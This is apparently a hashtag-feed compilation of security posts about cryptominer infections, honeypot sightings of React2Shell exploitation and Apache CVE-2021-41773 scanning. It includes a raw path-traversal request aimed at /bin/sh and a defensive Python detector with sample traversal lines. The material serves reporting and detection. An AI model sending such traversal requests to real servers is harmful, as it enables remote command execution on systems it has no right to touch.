Watch out as new .NET AOT malware hides its code as a black box, making detection far harder while delivering Rhadamanthys infostealer and crypto miner.
Read: https://hackread.com/net-aot-malware-code-black-box-evade-detection/
I had a chance last week to chat with Benjamin Read of #Wiz. Last month, Read and other members of his team published a deep dive into the #React2Shell
(CVE-2025-55182) vulnerability, and I was curious to see what has been hitting my honeypot, so I took a closer look.
This is doing some weird stuff, friends.
As is normally the case with exploits targeting internet-facing devices, once the exploit becomes known, it ends up in the automated scanners used by threat actors and security researchers. What I've seen over the past week is a combination of both.
In just a few hours of operation, I identified a small number of source IP addresses exploiting React2Shell by pointing the vulnerable system at URLs hosting BASH scripts. These scripts are really familiar to anyone who routinely looks at honeypot data - they contain a series of commands that pull down and execute malicious payloads.
And as I've seen in the past, some of these payloads use racially inflammatory language in their malware. It's weird and gross, but unfortunately, really common.
But while most of these payloads were "the usual suspects" - remote shells, cryptocurrency miners - there was one payload that stuck out.
It's an exploit file, based on this proof-of-concept [https://github.com/iotwar/FIVEM-POC/blob/main/fivem-poc.py] designed to DDoS a modded server running "FiveM," a popular version of the game Grand Theft Auto V.
Let that one sink in: among the earliest adopters of a brand new exploit are...people trying to mess with other people's online game servers.
I've long said that exploits like these are the canaries in the datacenter coal mine. After all, if an attacker can force your server to run a cryptominer (or a game DDoS tool), they can force it to run far more malicious code.
I guess someone, or a group of someones, just want to ruin everyone's good time, no matter how or what form that takes. And they'll do it in the most offensive way possible.
Anyway, patch your servers, please, if only to stick it to these people who want to be the reason we can't have nice things.
#PoC #exploit #CVE_2025_55182 #DDoS #FiveM #REACT #Bash #cryptominer #malware
My VPS keeps getting infected with a cryptominer right after I reinstall Ubuntu 24.04. Bots attack the root password in the window between first boot and running my Ansible hardening script. Symptoms: CPU at 100%, a suspicious process (XMRig), system logs wiped. Questions: Is a 50-character password strong enough? How do I lock down the server during the install phase? #securitytips #cryptomining #Ubuntu #VPS
Tags: #VPSsecurity #cryptominer #Ubuntu2404 #Ansible #BruteForce #HandsOnExperience #ServiceSystems
Crypto Miner in hotio/qbittorrent
https://apogliaghi.com/2025/09/crypto-miner-in-hotio/qbittorrent/
#HackerNews #CryptoMiner #hotio #qbittorrent #cryptocurrency #technology
A Linux cryptominer has been quietly spreading malware for years by hijacking legit websites with SSL certs.
🔗 https://hackread.com/linux-cryptominer-using-legit-sites-to-spread-malware/
Finally completed my rebuild of my #Grafana #prometheus #vps stack.
The old one was hosed in a 3 month battle with a #cryptominer
It was #docker but they kept fucking the Prometheus container.
I rebuilt everything from scratch. The panels are integrated into a single JSON file, rather than in libraries.
The stack is now #podman. Rootless execution.
But I couldn't get it to get #cadvisor to feed it.
So I got a dodgy scraper script.
But even with nice, it loads the low tier VPS to 14%
Every #appliance whose job is to get hot should be a #cryptoMiner or a #heatPump
#electronics #technology #bitcoin #cryptocurrency #crypto #appliances #home
CVE-2021-41773 and CVE-2021-42013 ending in crypto mining by RedTail ( https://nfsec.pl/ai/6597 ) #cryptominer #botnet #redtail #linux #security #twittermigration
Automated scanners looking for Apache HTTP servers vulnerable to path traversal and remote command execution are still circulating on the net. For example, from two Chinese IP addresses, 117.184.158.27 and 124.165.198.25, we may be treated to the following POST request:
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
accept: */*
host: 1.2.3.4:443
upgrade-insecure-requests: 1
user-agent: Custom-AsyncHttpClient
content-length: 109
content-type: text/plain
x-http-version: 1.1
x-remote-port: 52454
x-forwarded-for: 124.165.198.25
[…]
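Detection logic for the request pattern shown in the post above, as an added example that is not part of the original post or of nfsec.pl: it percent-decodes the request path (twice, because the CVE-2021-42013 variant double-encodes the dot), looks for a resulting `..` segment, and flags a `/cgi-bin/` traversal that resolves to a shell binary as an RCE attempt. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not taken from any real log).
SAMPLE_REQUEST_LINES = [
    "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1",          # CVE-2021-41773 style, aimed at /bin/sh
    "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1",  # CVE-2021-42013 double-encoded variant
    "GET /index.html HTTP/1.1",                                    # benign
    "GET /cgi-bin/printenv HTTP/1.1",                              # benign cgi-bin request
    "GET /images/../../etc/passwd HTTP/1.1",                       # plain (unencoded) traversal
]

DOT_SEGMENT = re.compile(r"(^|/)\.\.(/|$)")
SHELL_TARGET = re.compile(r"/bin/(sh|bash|dash)$")


def decode_path(raw: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times; stop early once the path stops changing."""
    path = raw
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request_line(line: str) -> str:
    """Return 'traversal-rce', 'traversal' or 'clean' for one HTTP request line."""
    parts = line.split()
    if len(parts) < 2:
        return "clean"
    raw_path = parts[1].split("?", 1)[0]
    decoded = decode_path(raw_path)
    if DOT_SEGMENT.search(decoded) is None:
        return "clean"
    # Traversal under /cgi-bin/ that lands on a shell is the Apache 2.4.49/2.4.50 RCE shape.
    if decoded.startswith("/cgi-bin/") and SHELL_TARGET.search(decoded):
        return "traversal-rce"
    return "traversal"


def scan_request_lines(lines):
    """Map each request line to its verdict; used to triage a batch of log entries."""
    return {line: classify_request_line(line) for line in lines}


if __name__ == "__main__":
    for line, verdict in scan_request_lines(SAMPLE_REQUEST_LINES).items():
        print(f"{verdict:14} {line}")
```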
Fake Job Offers from CrowdStrike Used by Cybercriminals to Distribute Cryptominer - https://www.redpacketsecurity.com/cybercriminals-use-fake-crowdstrike-job-offers-to-distribute-cryptominer/